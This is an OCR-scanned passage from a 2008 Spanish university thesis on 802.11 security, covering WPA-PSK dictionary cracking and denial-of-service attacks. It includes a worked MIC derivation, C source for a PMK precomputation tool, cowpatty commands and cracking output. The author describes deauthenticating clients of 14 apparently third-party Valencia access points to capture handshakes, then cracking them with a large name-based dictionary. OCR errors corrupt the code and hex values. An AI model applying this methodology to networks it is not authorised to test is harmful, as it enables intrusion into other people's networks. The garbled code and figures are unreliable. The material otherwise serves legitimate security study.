PRF-X (PMK, Longitud (PMK) , "Expansion de la clave", 






Min (AP MAC,STA MAC) | | Max (AP MAC, STA MAC) 








| Min (ANonce, SNonce) || Max (ANonce, SNonce) ) 


PTK 


= SHA1 PRF ( 








9e99 


88bd 


e2cb 


a743 95c0 


289f fdaO 7bc4 ; PMK 




lffa 


889a 


3309 


237a 2240 


c934 bcdc 7ddb 




,32, 








, ; Longi 




000c 


41d2 


94fb 


OOOd 3a26 


lOfb 893e e551 ; MAC y valores Nonce 




2145 


57ff 


f3c0 


76ac 9779 


15a2 0607 2703 




8e9b 


ea9b 


6619 


a5ba b40f 


89cl dabd cl04 




d457 


411a 


ee33 


8c00 fa8a 


lf32 abfc 6cfb 




7943 


60ad 


ce3a 


fb5d 159a 


:6,76) 


PTK 


= ccbf 97a8 2b5c 51a4 4325 a77e 9bc5 7050 ; PTK resultado 




daec 5438 430f OOeb 893d 84d8 b4b4 b5e8 




19f4 dceO cc5f 2166 e 


34f db3e af68 eb76 




80f4 e264 6e6d 9e36 260d 89ff bf24 ee7e 



Al calcular la PTK, tan solo quedaria diferir el "Hash" MIC a partir de esta. 
Para ello se utiliza una parte de la PTK, la llamada "Clave MIC", este 
parametro no es mas que un escision de la PTK con una longitud "n", pasada 
tambien como parametro. En nuestro ejemplo su valor es 16. 
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MIC = HMAC_MD5 (Clave MIC, 16, Paquete EAPoL) 

MIC = HMAC_MD5 ( ; Primeros 16 bytes de la PTK 

ccbf 97a8 2b5c 51a4 4325 a77e 9bc5 7050,16, 

0103 005f feOl 0900 0000 0000 0000 0000 ;Datos paquete EAPoL 

1400 0000 0000 0000 0000 0000 0000 0000 

0000 0000 0000 0000 0000 0000 0000 0000 

0000 0000 0000 0000 0000 0000 0000 0000 

0000 0000 0000 0000 0000 0000 0000 0000 

0000 0000 0000 0000 0000 0000 0000 0000 

) 

MIC = dOca 4f2a 783c 4345 bOcO 0al2 eccl 5f77 ; Control de 

; integridad 



El MIC capturado es comparado con el nuevo MIC estimado, si ambos 
coinciden el atacante ha obtenido la PSK. 



MIC calculado usando el cuarto paquete EAPoL con "fraseTest" 
dOca 4f2a 783c 4345 bOcO 0al2 eccl 5f77 

MIC capturado 

dOca 4f2a 783c 4345 bOcO 0al2 eccl 5f77 

Los MIC calculados coinciden ! ! Se ha conseguido la PSK que es 

"fraseTest" 



5.2.1.2 Ataque de Denegacion de Servicio 



Al margen de los ataques de denegacion de servicio causados por deficiencias en el 
disefio del protocolo IEEE802. 1 1 ( vease el apartado de DoS en WEP) o bien los producidos 
por la emision de ruido en el canal eliminando toda posible comunicacion por 
radiofrecuencia, existen ataques de esta clasificacion que son posibles debido a la propia 
implementacion del estandar IEEE802.1H. Asi pues podemos encontrar dos posibles brechas 
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de seguridad en cuanto al protocolo de cifrado TKIP y al estandar IEEE802.1X se refieren. 

En primera instancia el estandar IEEE802.1X utilizado para el proceso de 
autenticacion de las estaciones, puede ser sometido a una denegacion de servicio si un 
atacante consigue inundar con tramas de inicio de comunicacion el AP objetivo. De esta 
manera realizando un envio masivo de paquetes "EAPoL Start" con diferentes direcciones 
MAC de origen es posible consumir los recursos del punto de acceso, produciendo que 
cualquier estacion licita no pueda establecer el proceso de autenticacion contra el AP. Asi 
mismo es posible cancelar todo el trafico de un AP explotando para ello debilidades en el 
manejo del algoritmo de control de integridad "Michael" utilizado en el protocolo cifrado 
TKIP. 

Destacar que para estas debilidades teoricas existen aplicaciones que implementan 
dichas carencias de seguridad. 



5.2.2 ESTUDIO PRACTICO DE LA VULNERABILIDAD 

Hasta el momento se ha revisado el conjunto de vulnerabilidades que afectan al 
protocolo de seguridad 802. 1 1 WPA de una forma teorica, estableciendo las debilidades que 
seran puestas en practica en el siguiente punto. A su vez se ha realizado una revision practica 
de las debilidades que afectan al protocolo de seguridad WEP. 

WPA representa una mejora sustancial en la seguridad del estandar IEEE802.il, 
suponiendo la unica alternativa seria actual (en lo que a seguridad se refiere) dentro de esta 
tecnologia. Es por eso que parte de este proyecto se ha centrado en intentar vulnerar el 
mencionado protocolo mediante ataques de diccionario y denegacion de servicio. Para ello y 
utilizando la misma metodologia empleada para el analisis del protocolo WEP, en esta 
seccion se estableceran los siguientes aspectos: 

• Escenario de pruebas: se ha identificado los puntos de acceso que seran 
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vulnerados, para ello se ha establecido la localizacion de las pruebas asi como 
detectado los APs. Destacar que el escenario utilizado para esta demostracion 
practica difiere completamente del utilizado para WEP. 

• Herramientas utilizadas : tanto Hardware como Software, se ha procedido a 
realizar un analisis de las diferentes aplicaciones que han permitido llevar a la 
practica los diferentes ataques, asi como se han desarrollado otras 
expresamente para el proyecto. 

• Vulnerabilidades a explotar : en la seccion teorica , se han establecido las 
posibles brechas de seguridad que presenta WPA. Concretamente se han 
levado a la practica las siguientes pruebas: 

o Ataques de diccionario y fuerza bruta 

o Ataques de DoS 

Como se ha comentado, para el estudio practico del protocolo WPA, es necesario 
hacer uso de una serie de herramientas que nos ayudaran a implementar las debilidades 
mencionadas. En la red de Internet es posible encontrar numerosas utilidades que permiten 
acometer este estudio practico y que conviene someterlas a un proceso de seleccion segun 
diversos factores. Asi pues a continuation se definira el criterio de seleccion que se va ha 
seguir para la election de las aplicaciones, el cual seguira un modelo de pesos. Destacar que 
el criterio de seleccion de las herramientas difiere del utilizado para la parte practica del 
protocolo WEP. Ha sido necesario realizar ajustes en el factor multiplicativo de las 
caracteristicas ya que para el estudio practico WPA se buscan otras funcionalidades y 
caracteristicas de las aplicaciones. 



5.2.2.1 Criterio de seleccion de las herramientas 

Clasificaremos las caracteristicas de la herramienta segun los criterios de la tabla 
siguiente. Para cada caracteristica asignaremos un factor multiplicativo segun su importancia. 
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Esto nos permitira ponderar segun el parametro que nos interese. 



Caracteristica 


Factor multiplicative 


Comentarios 


Documentacion 


1.3 


Cantidad de documentacion accesible. 


Cumple su cometido 


1.5 


Si la herramienta realiza su cometido 
tras un test previo. 


Velocidad 


1.9 


Velocidad de funcionamiento basada 
en test comentados posteriormente. 


Facilidad de uso 


1.1 


Si presenta o no interfaces 
complicados. 


Ambito de distribucion 


1.1 


Reconocimiento de la comunidad por 
dicha herramienta. 



Tablet 5.9: Criterio selection de herramientas 

De esta manera realizaremos una valoracion de cada una de las caracteristicas 
mediante un sistema de pesos, es decir estableceremos una puntuacion del 1 al 10 a cada una 
de las herramientas y a cada una de sus caracteristicas. Dicho resultado sera ponderado con el 
factor multiplicativo de la tabla estableciendo una peso final que nos orientara en la seleccion 
de la herramienta. 



5.2.2.2 JUSTIFICACION DE LA ELECCION DE LAS HERRAMIENTAS 

Existen numerosas aplicaciones que nos permiten llevar a la practica los estudios 
realizados hasta el momento, en esta seccion las presentaremos, siendo sometidas a los 
criterios de seleccion definidos. 

Nombre : Suite Aircrack (Airolib) 

Descripcion : Descrita en la seccion referente a WEP nos permitira realizar ataques de fuerza 
bruta y diccionario contra WPA. Gran velocidad en el calculo gracias a su reducida y 
optimizada funcion de calculo PMK. Utiliza una base de datos Sqlite3 para guardar el 
resultado de las capturas. Destacar que permite la posibilidad de crear tablas de "HASHES", 
es decir permite precalcular el ataque guardando la salida a un archivo. 
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Total Peso : 59.1 



Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


9 


11.7 


Cumple su cometido 


1.5 


9 


13.5 


Velocidad 


1.9 


8 


9.5 


Facilidad de uso 


1.1 


8 


8.8 


Ambito de distribucion 


1.1 


9 


9.9 



Tabla 5.10: Suite Aircrack (Airolib) 

Nombre : CowPatty 4.0 

Descripcion : Aplicacion que permite realizar ataques de fuerza bruta y diccionario a WPA. 
Destacar que permite la posibilidad de crear tablas de "HASHES", es decir permite 
precalcular el ataque guardando la salida a un archive Baja velocidad de calculo. 

Total Peso : 50 8 



Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


7 


9.1 


Cumple su cometido 


1.5 


9 


13.5 


Velocidad 


1.9 


5 


17,1 


Facilidad de uso 


1.1 


8 


8.8 


Ambito de distribucion 


1.1 


9 


9.9 



Tabla 5.11: CowPatty 4.0 

Nombre : CalculaPMKl.l 

Descripcion : Herramienta que ha sido desarrollada explicitamente para este estudio practico 
basada en el codigo fuente de Aircrack y Cowpatty. Sera comentada mas adelante. 

Total Peso : 61 
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Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


9 


11,7 


Cumple su cometido 


1.5 


9 


13,5 


Velocidad 


1.9 


9 


9,9 


Facilidad de uso 


1.1 


8 


8,8 


Ambito de distribucion 


1.1 


9 


9,9 



Tabla 5.12: CalcidaPMK 

Nombre : Mdk3 

Description : Herramienta de analisis de seguridad WEP, que permite realizar ataques de 
denegacion de servicio tanto a WPA . 

Total Peso : 34 7 



Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


9 


2,6 


Cumple su cometido 


1.5 


6 


9 


Velocidad 


1.1 


9 


9,9 


Facilidad de uso 


1.1 


6 


6,6 


Ambito de distribucion 


1.1 


6 


6,6 



Tabla 5.13: Mdk3 

Es conveniente resaltar el hecho de que las herramientas presentadas cumplen las 
funciones necesarias para llevar a la practica los estudios teoricos presentados. Asi pues es 
necesario seleccionar para cada debilidad presentada la herramienta adecuada. Con este 
objetivo se presenta la tabla siguiente, que define la eleccion de la aplicacion teniendo en 
cuanta los resultados del analisis de pesos y la funcionalidad que se pretende utilizar. 
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Aplicacion/ Ataque 


DoS 


Diccionario/Fuerza bruta 


Aircrack(53.4) 




X 


CowPatty (58.4) 




X 


Mdk3 (34.7) 


X 




CalculaPMK (61) 




X 



Tabla 5.14: Comparativa herramientas 

De la tabla anterior se extraen los siguientes resultados. 

• Aplicacion seleccionada para ataques de DoS fue Mdk3 puesto que no se ha 
encontrado otra aplicacion que genere una DoS, utilizando para ello 
vulnerabilidades de WPA. 

• Aplicacion seleccionada para ataques de Diccionario/ Fuerza Bruta fue 
CalculaPMK en conjuncion con Cowpatty como mas adelante se explicara. 



5.2.2.3 Maqueta hardware utilizada para la prueba 

Tras la seleccion de las herramientas software a utilizar para el test, es necesario 
establecer el conjunto de recursos hardware utilizados para la prueba tecnica. La seleccion de 
la electronica de red asi como del computador es inmediata puesto que no es imprescindible 
para la prueba ningun elemento que requiera particularidades tecnicas. De este modo podemos 
distinguir dos elementos hardware principalmente que a continuacion se detallan. 

• Ordenador Portatil NEC (utilizado para el estudio de los ESSIDs mas 
populares y ataques de DoS) 

o Intel Centrino 1.5 Ghz 

o 512 Mb de memoria RAM 



o Sistema operativo Backtrack 3 (Live linux) 
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o Slot PCMCIA 

o Tarjeta inalambrica con chipset Broadcom 

Grid de 5 maquinas (utilizado para realizar el precomputo de hashes) 

o Computadorl, Computador2, Computador3 

■ Intel Xeon 3070 a 2,66Gh doble core, bus frontal 1066 Mhz 

■ 4 Gb RAM a 666Mhz 

■ SO Fedora 7 

o Computador4, Computador5 

■ Intel Xeon 5160 a 3Ghz, 2 procesadores doble nucleo, bus 
frontal 1333 Mhz 

■ 16 Gb RAM a 667 Mhz 

■ SO Red Hat Enterprise 4 
o Total 14 procesadores dedicados 



5.2.2.4 Ataque de Diccionario y fuerza bruta 

Para llevar a la practica el ataque de diccionario conviene establecer genericamente las 
acciones realizadas: 

• Se ha tornado en el escenario de pruebas 14 capturas de de datos que 
representan a 14 APs con diferente ESSID, fruto de del estudio de los ESSIDs 
mas populares de la ciudad de Valencia. Todo ello realizado mediante la 
aplicacion Airodump y cuyo funcionamiento ya ha sido explicado 
anteriormente. 
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• 



Posteriormente se ha desarrollado la aplicacion CalculaPMK 1.0 a partir del 
codigo fuente de Aircrack y Cowpatty. Posteriormente se ha optimizado la 
aplicacion CalculaPMK 1.0 obteniendo un rendimiento superior al que 
realizaba, generando la aplicacion CalculaPMK 1.1. Las optimizaciones 
realizadas seran comentadas mas adelante. 

El ataque de diccionario ha sido llevado a cabo mediante un grid de 5 
maquinas (14 procesadores dedicados en total) en el Instituto de Robotica de la 
Universidad de Valencia, haciendo uso de la aplicacion comentada y un 
conjunto de herramientas de apoyo. 

• Tras el calculo intensivo se han obtenido los resultados que mas adelante se 
comentaran. 

Asi pues y entrando en detalle a continuacion se explica mas exhaustivamente la 
metodologia utilizada para la demostracion practica. 



5.2.2.4.1 ESTRATEGIA DE ACTUACION 

Como se decidio en la seccion anterior la aplicacion escogida para la prueba practica 
fue la herramienta CalculaPMKl.l (Ver anexo B), dicha herramienta nos permite, dado una 
lista de palabras a estimar como PSK y un ESSID concreto, precalcular el PMK de cada una 
de las entradas, volcando dicha information a un fichero llamado tabla hash o rainbowTable. 
El principal motivo por el cual se tiene en cuanta esta aproximacion es el hecho de la gran 
carga computacional que el algoritmo SHA1 (presente en calculo de la PMK) requiere para 
realizar su calculo. Este detalle tremendamente relevante es el que confiere robustez ante 
ataques de diccionario y fuerza bruta al estandar IEEE802.1H. A continuacion se definen las 
dos estrategias de actuation. 

1. Por una parte es posible realizar un ataque de diccionario sin almacenar el 
computo realizado en un fichero (tabla hash). De esta forma tanto la aplicacion 
Cowpatty como Aircrack permiten dado un diccionario origen realizar los 
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calculos necesarios para llegar a comparar el MIC capturado con el MIC 
estimado. 

2. Por otra parte es posible almacenar en una rainbowTable los resultados de las 
operaciones mas costosas para el algoritmo, el ya comentado calculo de la 
PMK. Asi pues, la aplicacion "calculaPMK" se encargara de precomputar el 
PMK para cada una de las entradas del diccionario, obteniendo asi un gran 
archivo de datos con una relacion PSK-PMK. Posteriormente la aplicacion 
Cowpatty puede tomar como entrada la tabla precalculada terminado de 
realizar las operaciones restantes (mucho menos costosas) y comparando la 
estimacion con el archivo de captura. Pero, ^Que diferencia en cuanto a la 
velocidad de calculo puede haber?, pues bien, utilizando la primera 
aproximacion y usando Cowpatty es posible llegar a una tasa de 50 
palabras/segundo, mientras que utilizado el precomputo de tablas se obtienen 
50 palabras/segundo (muchas mas con la aplicacion desarrollada calculaPMK 
como ya veremos) para calcular las tablas y una tasa de 80.000 
palabras/segundo para comparar contra el archivo de captura el calculo 
realizado. 

La segunda aproximacion nos permite mantener una "memoria" de los calculos 
realizados, ya que una vez calculadas las tablas el ratio de 50 palabras/segundo pasa a ser 
enormemente superior obteniendo tasas al rededor de las 80.000 palabras/segundo. Esta es la 
principal razon por la cual se opta por la segunda estrategia. 



5.2.2.4.2 COMENTARIOS PREVIOS 

El sistema de cifrado WPA presenta, como se demostro en la parte teorica, cierta 
susceptibilidad a ser atacada mediante ataques de diccionario o fuerza bruta. El equipo de 
ingenieros que desarrollo el estandar IEEE802.1H trabajo para cubrir las carencias de 
seguridad de WEP y ademas obstaculizar de la mayor manera posible los ataques contra este 
afiadido al estandar IEEE802.il. De esta manera utilizaron, como ya se comento 
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anteriormente, el ESSID de la red para realizar el calculo de la PMK. Dicho disefio produce la 
necesidad de realizar el ataque de diccionario, utilizando la debilidad MIC, a un unico 
ESSK). Con esto se quiere hacer destacar que cada ataque es realizado a un unico archivo de 
captura. 

Como ya se comento, el valor comparado en la captura y la salida de la aplicacion es 
el valor del "HASH" MIC. Realizando un rapido resumen, el calculo de este dato es el 
resultado de aplicar la funcion "HASH" SHA-1 a la PSK generando la PMK. Mediante esta 
ultima aplicando el algoritmo PRMF-512 es generada la clave temporal PTK. Usando parte de 
esta ultima se obtiene el MIC mediante la funcion de HASH MD5. 

Como se puede observar para llegar a conseguir el MIC deseado se han tenido que 
realizar sucesivos algoritmos y funciones de HASH con un coste computacional elevado. Esto 
produce que el ataque de fuerza bruta se realice con tasas de prueba muy bajas y que se 
comentaran mas adelante. Destacar, que de todas las sucesivas transformaciones y etapas 
desde que se tiene la PSK hasta obtener el MIC, la que con diferencia requiere de un coste de 
computacion mas elevado es el calculo de la PMK mediante el HASH SHA-1. De aqui que 
surgiera la idea, por parte del grupo desarrollador de CowPatty de incorporar las llamadas 
"Rainbow tables". Estas tablas no son mas que una precomputacion del valor SHA-1 para un 
unico ESSID. Asi pues una de las funcionalidades que permite esta herramienta es la 
posibilidad de crear dichas tablas para cada ESSK) guardando el resultado en un archivo 
binario. Posteriormente y una vez creadas las tablas tan solo sera necesario lanzar la 
aplicacion pasando como parametro el archivo de captura y la tabla correspondiente al ESSID 
seleccionado. Cowpatty realizara utilizando el SHA-1 precalculado el resto de operaciones 
necesarias para obtener el MIC, consiguiendo tasas de prueba del orden de 80.000 palabras 
por segundo. 

Dado el escaso ratio de palabras computadas por segundo que ofrecian las aplicaciones 
"Aircrack" y "Cowpatty" surgio la necesidad de desarrollar una aplicacion que con los 
minimos calculos obtuviera mayores resultados en cuanto a velocidad de computo. De esta 
manera, utilizando como nucleo de la nueva aplicacion el codigo de "Aircrack" y como base 
el aplicativo "Cowpatty" se desarrollo "CalculaPMKl.O", obteniendo rendimientos superiores 
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a los conseguidos por los programas fuente. El estudio que muestra tales resultados sera 
tratado con profundidad en la seccion "Analisis de resultados WPA". Asi pues se ha 
conseguido una aplicacion capaz de obtener la precomputacion de PMKs guardando total 
compatibilidad con "Cowpatty", programa con el que posteriormente a partir de las tablas 
obtenidas realizara los calculos necesarios para comparar la captura con la estimacion. 

Como se ha comentado la aplicacion CalculaPMKl.O consigue un mejor rendimiento 
que sus programas fuentes Cowpatty y Aircrack. Pero todavia fue posible realizar algunas 
optimizaciones de codigo que a continuacion se comentan y que originaron una segunda 
version de la aplicacion, CalculaPMKl.l. La principal modificacion es realizada en la funcion 
calculapmk del archivo fuente PMK.c, todo el codigo puede consultarse en el Apendice B. 
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void CalculaPMK(char *key,char *essid_pre, union UPMK *upmk) 

{ 

int ij.slen; 

union UBUFFER buffer; 

char essid[33+4]; 

SHA_CTXctx_ipad; 

SHA_CTX ctx_opad; 

SHA_CTX sha1_ctx; 

memset(essid,0,sizeof(essid)); 

memcpy(essid,essid_pre,strien(essid_pre)); 

slen=strlen(essid)+4; 

memseHbuffer.buffer.O.sizeoffbuffer)); 
strncpy((char *)buffer. buffer, key,sizeof(buffer)); 

for(i=0;i<16;i++) 

buffer.ibuffer[i] A =0x36363636; 

SHA1_lnit(&ctx_ipad); 
SHA1_Update(&ctx_ipad,buffer.buffer,64); 

for(i=0;i<16;i++) 

buffer.ibuffer[i] A = 0x6A6A6A6A; 

SHA1_lnit(&ctx_opad); 
SHA1_Update(&ctx_opad,buffer.buffer,64); 

essid[slen-1]='\1'; 

HMAC(EVP_sha1(), (unsigned char *)key,strlen(key), (unsigned char *)essid,slen,upmk->pmk,NULL); 

memcpy(buffer. buffer, upmk->pmk,20); 

for(i=1;i<4096;i++) 

{ 

memcpy(&sha1_ctx,&ctx_ipad,sizeof(sha1_ctx)); 

SHA1_Update(&sha1_ctx,buffer.buffer,20); 

SHA1_Final(buffer.buffer,&sha1_ctx); 

memcpy(&sha1_ctx,&ctx_opad,sizeof(sha1_ctx)); 

SHA1_Update(&sha1_ctx,buffer.buffer,20); 

SHA1_Final(buffer.buffer,&sha1_ctx); 

for(j=0;j<5;j++) 

upmk->ipmk[j] A = buffer, ibufferfj]; 



} 

essid[slen-1]='\2'; 

HMAC(EVP_sha1(), (unsigned char *)key,strlen(key), (unsigned char *)essid,slen,upmk->pmk+20,NULL); 

memcpy(buffer. buffer, upmk->pmk+20, 20) ; 

for(i=1;i<4096;i++) 

{ 

memcpy(&sha1_ctx,&ctx_ipad,sizeof(sha1_ctx)); 

SHA1_Update(&sha1_ctx,buffer.buffer,20); 

SHA1_Final(buffer.buffer,&sha1_ctx); 

memcpy(&sha1_ctx,&ctx_opad,sizeof(sha1_ctx)); 

SHA1_Update(&sha1_ctx,buffer.buffer,20); 

SHA1_Final(buffer.buffer,&sha1_ctx); 

for(j=0;j<5;j++) 

upmk->ipmk[j+5] A =buffer.ibuffer[j]; 



En la version 1.0, la aplicacion realizaba un uso de la funcion XOR byte a byte para el 
calculo de la PMK, realizando numerosos calculos que pueden ser evitados agrupando en 
bloques de 4 en 4 bytes y realizando la XOR posterior. Para ello se utilizo la "union UPMK" 



162 de 200 



Roberto Amado Gimenez 
06/03/2008 



m 



Escola Tecnica Superior D'Enginyeria 
Analisis De La Seguridad En Redes 802.11 




(resaltada en el codigo anterior) la cual hace uso de un tipo de datos "unsigned int" formado 
por 4 bytes, dejando a un lado la aproximacion de la version 1.0 que utilizaba un tipo de datos 
"unsigned char" formado por 1 byte. Destacar que no se utilizo un tipo de datos de tamano 
superior ya que se incurria en una perdida en el alineamiento de datos. 

Esta mejora permite incrementar el numero de palabras por segundo originando la 
version CalculaPMKl . 1 . 

Llegados a este punto tan solo falta concretar cual sera la fuente de datos a calcular, de 
esta forma se dio paso a dos tareas fundamentales para realizar con exito el ataque de fuerza 
bruta, el estudio de los ESSID mas populares y la generacion de un diccionario de pruebas. 



5.2.2.4.3 Generacion de la fuente de datos 

Estudio de los ESSID mas populares 

Para esta prueba practica se ha requerido realizar un estudio de los ESSIDs mas 
populares de la ciudad de Valencia con el objetivo de precalcular sus tablas de HASH 
mediante Cowpatty. Para ello se ha procedido a realizar una recoleccion de informacion sobre 
los puntos de acceso detectados en la capital del Turia. De esta manera se procedio a realizar 
un recorrido en coche por las zonas donde mayor cumulo de puntos de acceso pudiera darse 
(zona de estudiantes, centro de la ciudad, avenidas principales). El itinerario realizado puede 
verse marcado en rojo en la imagen siguiente. 

Durante el recorrido realizado se obtuvo una captura datos de cada una de los 14 APs 
mas populares, obteniendo asi el "Handshake" deseado para el ataque. La metodologia 
utilizada para la captura del saludo inicial fue una escucha pasiva del medio, realizando una 
DoS de un cliente asociado al punto de acceso con el objetivo de obligar a la estacion a 
reautenticarse. El proceso de de DoS ya fue comentado en la seccion pertinente. 
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Arnaude 







Figura 5. 44: Localizacion zonas de captura 



El estudio realizado nos ofrece como resultado la deteccion de 2658 AP's y nos 
permite establecer que los 14 ESSIDs mas populares de la ciudad de Valencia y que utilizan 
WPA como protocolo de seguridad son los que se detallan a continuacion. 



Sinus TC300 


belkin54g 


dlink 


eduroam 


default 


barcelo_public 


Motorola 


THOMSON 


NETGEAR 


SMC 


Tele2 


linksys 


WebSTAR 


WLAN 











Tabla 5.15: Lista ESSIDs 



Una vez determinado el conjunto de ESSIDs a analizar para la prueba, se procedio a 
construir un diccionario de posibles palabras claves, que constituyo, junto con identificador de 
la red, la fuente de datos para la aplicacion "calculaPMKl.l". 
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Diccionario de claves 



Generar un buen diccionario de posibles claves, que recopile al menos, las cadenas 
que con mas probabilidad puedan ser utilizadas por el administrador del punto inalambrico, 
conformo una pieza clave para conseguir un alto numero de aciertos. De esta manera se 
elaboro un diccionario con un total de 253.650.653 palabras dividido en 254 lotes de un 
millon de palabras cada uno, obteniendo asi, un tamano total en disco de 3.350 Mbytes. 

En primera instancia se partio del diccionario castellano que utiliza la aplicacion 
OpenOffice con un total de 30.000 entradas. Este bloque fue introducido como fuente de 
datos para la aplicacion John the ripper 1 , la cual permite, a partir de la definicion de una serie 
de reglas, establecer modificaciones a las palabras del diccionario elaborado. Asi pues se 
realizaron las siguientes variaciones a cada una de las 30.000 entradas. 

• Se utilizo una regla que permitio afiadir al final de la palabra una fecha, desde 
1900 a 2008 

o Ejemplo : roberto2005, rosal980 

• Se anadio al final de la palabra una numeracion de dos digitos. 

o Ejemplo : roberto45, rosa99 

• Se introdujo un caracter alfanumerico [a-zO-9] al principio de la palabra. 

o Ejemplo : vlopez 

• Se introdujo un caracter alfanumerico [a-zO-9] al final de la palabra. 

o Ejemplo : vicentel 

• Se substituyeron vocales por numeros. 

o Ejemplo : n3tw0rk 



1 Aplicacion de generacion de diccionarios y ataques de fuerza bruta basada en reglas. 



Roberto Amado Gimenez 
165 de 200 06/03/2008 



m 




Escola Tecnica Superior D'Enginyeria 
Analisis De La Seguridad En Redes 802.11 

• Se afiadieron prefijos delante de la palabra. 

o Ejemplo: Mr.roberto 

• Se pluralizo las entradas. 

o Ejemplo: libros 

Conjunto de reglas a las que se les pueden sumar otro tanto definidas en el anexo A. 

Hasta el momento se obtuvieron aproximadamente un total de 100.000.000 de 
palabras a las que se le sumaron los siguientes bloques de datos. 

• Diccionario con terminos ingleses descargado de la red, el cual fue revisado y 
aplicados los filtros convenientes para eliminar error en la adaptacion al juego 
de caracteres. 

• Diccionario de terminos cientificos descargado de la red, corregido y revisado. 

• Diccionario de palabras mal sonantes (elaborado especialmente para el 
proyecto). 

• Diccionario de frases celebres (elaborado especialmente para el proyecto). 

• Diccionario de las ciudades espanolas y pueblos mas importantes, extraido de 
la red. 

• Diccionario de personajes celebres, descargado de la red. 

• Diccionario de grupos musicales y canciones populares, descargado de la red y 
revisado. 

• Diccionario de posibles numeraciones telefonicas. 

o Ejemplo : 6273455623 
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Diccionario de nombres y apellidos (castellanos) elaborado expresamente para 
el proyecto. Realizar especial mencion a este diccionario ya que para su 
construccion se utilizaron dos fuentes principalmente. 

o En primera instancia se obtuvo la lista de los nombres de pila 
permitidos por el catastro tanto masculinos como femeninos. 
Obteniendo al rededor de 20.000 entradas. Todo ello fue introducido en 
la aplicacion "John the ripper" aplicando las reglas comentadas. 

o En segundo lugar se extrajo de la heraldica de apellidos un listado de 
aproximadamente 2.000 apellidos castellanos con mas frecuencia de 
uso, el cual se le aplico nuevamente la aplicacion "John the ripper". 

A continuacion y en ultimo lugar se genero mediante la elaboracion de un 
script (no se especifica su codigo fuente debido a la enorme simplicidad) un 
listado formado por el par "nombre apellido". Es decir se para cada entrada del 
listado de nombres se le concateno el listado de apellidos. 

o Ejemplo: pedro martinez, pedro lopez, pedro garcia ... juan martinez, 
juan lopez. 



5.2.2.4.4 DESPLIEGUE DE DATOS 

Establecidos ya, las dos fuentes de datos principales para el estudio, el conjunto de 
ESSK) y el diccionario de pruebas, se dispuso a desplegar en el grid de maquinas las fuentes 
de datos preparadas mediante a siguiente distribucion. 
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Nombre del servidor 


ESSID a calcular 


COMPUTADOR 1 


eduroam 




linksys 


COMPUTADOR 2 


default 




dlmk 


COMPUTADOR 3 


barcelo_public 




belking54g 


COMPUTADOR 4 


Motorola 




NETGEAR 




Sinus. TC 300 




SMC 


COMPUTADOR 5 


Tele2 




THOMSOM 




WebStar 




WLAN 



Tabla 5.16: Dispersion de ESSIDs por computador 



De esta forma cada servidor se proceso las tablas hash correspondientes a los ESSIDs 
asignado mediante el diccionario elaborado y comentado anteriormente mediante la ejecucion 
de la siguiente instruccion. Destacar que a partir de ahora nos referiremos a CalculaPMK 
como a la version mejorada 1.1. 



calculaPMK -f diccionario -h hashout -s ESSID 



Mediante el parametro -f se establece el diccionario de datos origen, especificando 
mediante -h y -s el archivo de salida y el ESSID a utilizar respectivamente. Cabe destacar que 
dicha aplicacion fue lanzada mediante el uso de un script que tomaba como origen el conjunto 
de lotes generados a partir del diccionario y que obtenia como resultado la tabla hash 
precomputada perteneciente al lote ejecutado. 
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Por ultimo y tras 11 dias de calculos interrumpidos el total del diccionario fue 
precalculado. Un estudio mas a profundo de los tiempos utilizados por la aplicacion en la 
diferentes maquinas sera analizado y comentado en secciones posteriores. 

Una vez realizados los calculos se dispuso a comprobar la eficacia de la computacion 
realizada contra los archivos de captura obtenidos en el escenario de la prueba. 



5.2.2.4.5 GENERACION DE RESULTADOS 

A continuacion se describe el proceso realizado para obtener la PSK o clave 
precompartida a partir de la computacion realizada y sometida contra lo archivos de captura 
obtenidos en la ruta realizada por el escenario de pruebas. De esta manera de obtuvo una 
captura que contenia un "4-wayhandsake" para cada ESSID testeado, obteniendo la siguiente 
lista. 



Sinus TC300.cap 


belkin54g.cap 


dlink.cap 


eduroam.cap 


default, cap 


barcelo_public.cap 


Motorola, cap 


THOMSON, cap 


NETGEAR.cap 


SMC.cap 


Tele2.cap 


linksys.cap 


WebSTAR.cap 


WLAN.cap 











Tabla 5. 1 7: Listado de capturas 



Como ya se ha comentado anteriormente la aplicacion calculaPMK tan solo genera el 
resultado de precomputar el PMK asociado a una palabra clave y un ESSID concrete Todavia 
es necesario establecer el resto de calculos que permiten obtener el MIC que permitira ser 
comparado con el MIC del archivo capturado. Esta tarea la realiza la aplicacion "Cowpatty" la 
cual nos permitira determinar si la estimacion realizada en las entradas del diccionario 
coinciden con la del archivo de captura. De esta forma y para cada uno de los ESSID 
establecidos con sus respectivas tablas hash precalculadas se dispuso a lanzar la aplicacion 
mediante la siguiente instruccion. 
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cowpatty -r archivoCaptura -d tablaHash -s ESSID 



Donde el parametro -r establece el archivo de captura, -d determina la tabla hash a 
utilizar y el ESSID es indicado mediante -s. Obteniendo el siguiente resultado en pantalla. 



cowpatty 4*0 - WPA-PSK dictionary attack* <jwright@hasbor9*corri> 

Collected all necessary data to mount crack against WPA/PSK passphr 
Parting dictionary attack* Please be patient* 
~-™: lSeaport 

J 53dogl62 

f CHARLESW 

I Maulwurf 



K andujare\a 
tey no + lOOOOOt aposafranine 
;ey no* 110000: assaulte 



Figura 5.45: Cdlculo del PMK 

Como se puede observar en la imagen superior la aplicacion ha comenzado a 
precomputar posibles claves en apenas segundos han sido comprobadas 110.000 palabras. A 
continuacion se muestran dos capturas donde se ha podido conseguir la clave precompartida. 




Figura 5.46: Clave encontrada captura 1 
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key no, 920000: uniage"- 
key no + 930000: untune 

WOO: vederloo 

J0000: verwarnter 

I -••. no. iy- : ■■■■:■[ in' i:i r 

key no t 970000: weltoffene 

key no + 980000: x74ekhxh 

key no t 990000: zil . 

fread: Success 

Unable to identify the PSK from the dictionary file* Try expanding your 

passphrase list., and double-check the SSID + Sorry it didn't work out + 

996359 passphrases tested in 14 t 25 seconds: 69902 t 15 passphrases/second 
pula@pula-laptop:VProyecto/capturas WPA/capturas_proyectoI cowpatty -r 1 
cowpatty 4 + - WPA-PSK dictionary attack, < j wri asborg.com> 



Collected all necessary data to [,.„. 

Starting dictionary attack. Please be patient 



sys-01 + cap -d /rnedia/NDflS/Rbt/wpa 



Figitra 5.47: Clave encontrada captura 2 

